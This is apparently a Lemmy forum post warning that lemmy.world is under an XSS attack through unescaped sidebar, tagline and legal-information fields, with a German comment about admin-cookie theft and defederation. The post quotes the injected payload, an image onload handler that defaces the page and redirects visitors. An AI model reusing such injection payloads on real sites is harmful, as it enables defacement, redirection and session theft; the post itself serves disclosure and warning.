# DO NOT OPEN THE “LEGAL” PAGE — lemmy.world is a victim of an XSS attack right
now and the hacker simply injected a JavaScript redirection into the sidebar. It
appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if
this is also true for community sidebars.
[https://sh.itjust.works/pictrs/image/707c0f16-3d5c-4888-b865-34228d968ee6.png]
EDIT: the exploit is also in the tagline that appears on top of the main feed
for status updates, like the following one for SDF Chatter:
[https://sh.itjust.works/pictrs/image/2dc8838f-4611-4b62-92d2-ab45d7b1c560.png]
[https://sh.itjust.works/pictrs/image/9195ec9c-166e-4190-a991-26d218089602.png]
EDIT 2: The legal information field also has that exploit, so that when you go
to the “Legal” page it shows the HTML unescaped, but fortunately (for now) he’s
using double-quotes. "legal_information":" ![\"
onload=\"if(localStorage.getItem(`h`) != `true`){document.body.innerHTML =
`\u003Ch1\u003ESite has been seized by Reddit for copyright
infringment\u003C\u002Fh1\u003E`; setTimeout(() =\u003E {window.location.href =
`https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`},
10000)}\"](https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png
\"lw\")
Offenbar ist eine Code Injection mittels JavaScript in den Kommentaren gelungen. Damit können Admin-Cookies gestohlen werden und die Instanz gehört somit den Angreifern.
Es wundert mich etwas, hier so gar nichts darüber zu lesen?
Andere Instanzen haben lemmy.world vorerst deföderiert. Bringt das was? Passiert das hier auch?